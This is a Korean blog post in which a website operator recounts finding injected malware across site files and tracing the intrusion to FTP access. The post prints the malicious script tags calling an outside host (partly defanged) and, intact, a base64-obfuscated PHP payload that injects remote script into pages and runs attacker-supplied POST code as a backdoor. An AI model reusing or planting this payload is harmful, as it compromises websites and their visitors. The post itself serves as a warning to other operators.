Skip to content
조회 수 22012 추천 수 0 댓글 0
?

단축키

Prev이전 문서

Next다음 문서

크게 작게 위로 아래로 댓글로 가기 인쇄 첨부
?

단축키

Prev이전 문서

Next다음 문서

크게 작게 위로 아래로 댓글로 가기 인쇄 첨부

[해킹차단] 이런창이 뜨는 사이트들 정말 조심하길 바란다.

혹시 서버를 운영중이시라면 아래의 글을 참고로 하여 자신의 컴퓨터를 점검해주세요.

 

호기심에라도 아래의 코드는 클릭하지 마시고, 일부러 링크가 안되게 ..... 을 추가 시켰습니다.

무리하게 들어가지 말아주세요. ^^;;

 

구글크롬이 그나마 안전한 브라우저라 생각되어 웹검색은 크롬으로 하고 있는데, 구글크롬에서 상당히 자주볼 수 있는 국내 웹사이트들...

 

특히나 뉴스사이트들이다.

 

일단 아래의 경고메시지들은 해당사이트에 악성코드를 제공하는 이미지파일이나 스크립트 문구가 있으면 나타나는 문구이다.

 

 

3.JPG

 

헌데 어느날 갑자기 내 사이트에서도 저런 문구가 나타나기 시작했다.

처음에는 대수롭지 않게 보다가 자꾸 찜찜,,,

 

웹페이지 소스를 뒤져보니,

<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ></script>

 

등이 삽입되어 있는것이 아닌가?

 

어떤 노무새퀴?가 이런짓을???

 

 

우선 웹관련 파일인 *.js *.php *.htm 파일들에 thaizucht.de와 스팸모음 자료들을 토대로 하나씩 찾기 시작했다.

 

 

common/js폴더의 파일을 비롯 *.js 파일에

document.write('<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ><\/script>);

라고 254개의 파일에 넣어놨고,

 

htm, html 파일에는
<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ></script>

라고 7개의 파일에 넣어놨고,

 

php 파일에는

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbGxrcycpKXtmdW5jdGlvbiBsbGtzKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNSb1lXbDZkV05vZEM1a1pTOW5abmd2ZEdobmNsOXdjbU5mYkc5bkxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBsbGtzMigkYSwkYiwkYywkZCl7Z2xvYmFsJGxsa3MxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRsbGtzMSkpY2FsbF91c2VyX2Z1bmMoJGxsa3MxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdsbGtzJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbGxrcycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRsbGtzbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGxrczInKSkhPSdsbGtzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

라는 코드를 16개의 파일에 넣어놨다.


전체적으로 thaizucht.de 이 단어가 들어간 사이트를 추적해보았다,,,

9개가 더 발견..

 

4.JPG

 

 

 

 

이후 바이러스 검사까지 완료!

 

 

5.JPG

 

 

 

 

하루가 지나고 다음날,,,

 

허걱~~~

 

또 악성코드가???

 

우찌된 일이지?

 

 

아파치웹서버로그를 별도로 저장하지 않는터라, 다른 로그기록을 찾아보았다.

 

우선 파일부터 검색해봐야겠다.

 

혹시 날짜가 어떻게 바뀌었나?

 

분명 코드를 수정했으면 날짜가 바꼇을 터!!!~

 

오전 8시까지만해도 괜찮던것이 오후 8:52 ~ 8:53분에 일괄적으로 코드 수정됨...


파일 날짜가 이 시간대로 바뀐것들은 죄다 코드가 수정되어 있었고, 분명 Telnet과 FTP도 껏는데 우째 다시 실행되어 있다?

 

재부팅된 시간이 언제인가를 정확히 파악하기 위해서 PhpMyadmin의 상태를 보았다.

 

"이 MySQL 서버는 0 days, 16 hours, 48 minutes and 14 seconds 동안 구동되었습니다.
구동 시작날짜는 10-05-03 15:15 입니다."

 

어제 마지막으로 건드린 시간이었다.

결국 재부팅은 되지 않았으며, 일괄자료를 수정한 것으로 보이는데, 시간대가 비슷한 시간대인것으로 보아 FTP 로 접속한 듯...~~~ 음...,,

 

내 FTP비밀번호가 노출되었나?

일단 FTP서버도 차단시키고, 아이디도 몽땅 바꿨다.

 

다시 하루가 지나봐야 할 듯한데...

음,,, 여러분들의 서버에 혹시 침입자가 있지 않은지 확인해보세요.

위의 내용들은 구글 검색사이트에서 조차 나오지 않더군요.

 

알려지지 않은 또는 서버 운영자들도 잘 모르고 있었던 부분이 아닌가 싶네요.

 

 

 

 

로그인 후 댓글쓰기가 가능합니다.

?

List of Articles
번호 분류 제목 날짜 조회 수
117 컴퓨터잡담 Div 사용한 클릭시 테이블 숨기고 감추기 1 2010.07.03 19994
116 컴퓨터잡담 메모리 사용계획 어떻게 할것인가? 2 2010.06.30 15367
115 컴퓨터잡담 정부의 부동산 재테크 실력은 부동산 경기침체 때 발휘한다. 2010.06.27 5708
114 컴퓨터잡담 IE 접속제어 후킹 1 2010.06.23 7394
113 컴퓨터잡담 여러개의 엑셀파일을 하나로 합치기 2 2010.06.22 57310
112 컴퓨터잡담 유동 IP시간 만료로 리부팅해야만 인터넷 사용가능한 장애원인 해결방법 2 2 file 2010.06.19 13764
111 컴퓨터잡담 Windows Firewall/Internet Connection Sharing (ICS) 서비스를 시작할 수 없습니다. 4 2010.06.19 20903
110 컴퓨터잡담 Windows와 DOS 명령 프롬프트 환경 변수 리스트 1 4 2010.06.18 11182
109 컴퓨터잡담 셀에 현재 날짜와 시간 삽입 2010.06.15 10275
108 컴퓨터잡담 엑셀 다중조건 구현하기 2010.05.13 17311
107 컴퓨터잡담 curl대신 사용할 수 있는 소스 3 2010.05.11 16305
106 컴퓨터잡담 배치파일 IF문 2010.05.07 11571
105 컴퓨터잡담 시스템은 멀쩡한데 느닷없이 mysql 접속거부의 이유는 max_connect_errors과의 연관성 2 2010.05.06 20880
» 컴퓨터잡담 [해킹차단]이런창이 뜨는 사이트들 정말 조심하길 바란다. 3 file 2010.05.04 22012
103 컴퓨터잡담 Mysql 에러메시지 2010.04.27 17524
102 컴퓨터잡담 Table_open_cache 가 늘어나지 않는 이유. 1 3 2010.04.27 15514
101 컴퓨터잡담 트위터 개발하기 3 2010.04.26 13794
100 컴퓨터잡담 블로그/사이트의 키워드 훔쳐보기^^;; 2010.04.21 9206
99 컴퓨터잡담 DB MyISAM, InnoDB 입출력 처리방식 3 2010.04.20 13812
98 컴퓨터잡담 서버에 SSD 교체 작업을 해야되나? 2010.04.20 6521
Board Pagination Prev 1 ... 39 40 41 42 43 ... 46 Next
/ 46

http://urin79.com

우린친구블로그

sketchbook5, 스케치북5

sketchbook5, 스케치북5

나눔글꼴 설치 안내


이 PC에는 나눔글꼴이 설치되어 있지 않습니다.

이 사이트를 나눔글꼴로 보기 위해서는
나눔글꼴을 설치해야 합니다.

설치 취소